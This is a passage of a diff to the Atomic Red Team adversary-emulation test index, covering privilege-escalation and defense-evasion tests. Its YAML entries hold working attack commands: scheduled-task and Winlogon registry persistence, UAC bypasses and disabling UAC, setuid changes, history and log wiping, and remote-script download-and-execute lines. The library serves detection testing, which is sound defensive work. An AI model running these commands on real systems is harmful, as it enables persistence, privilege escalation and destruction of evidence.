'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1547.009: @@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true @@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1055.014: technique: @@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) - ' +' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'cp /bin/ls #{file_to_pad} - ' +' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' cleanup_command: 'rm #{file_to_pad} - ' +' name: sh T1542.003: technique: @@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) - ' +' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} - ' +' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) - ' +' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' name: command_prompt T1574.012: technique: @@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history - ' +' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm - ' +' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history - ' +' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history - ' +' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history - ' +' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history - ' +' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions - ' +' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file - ' +' supported_platforms: - linux - macos @@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog - ' +' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting - ' +' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname - ' +' cleanup_command: 'userdel -f testuser1 - ' +' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history - ' +' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing - ' +' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history - ' +' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath - ' +' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} - ' +' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} - ' +' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. - ' +' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} - ' +' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1553.002: technique: external_references: @@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} - ' +' executor: command: 'Invoke-Expression #{input_file} - ' +' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | gcc #{input_file} && ./a.out @@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: 'go run #{input_file} - ' +' name: bash T1218.001: technique: @@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) - ' +' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} - ' +' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} - ' +' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler 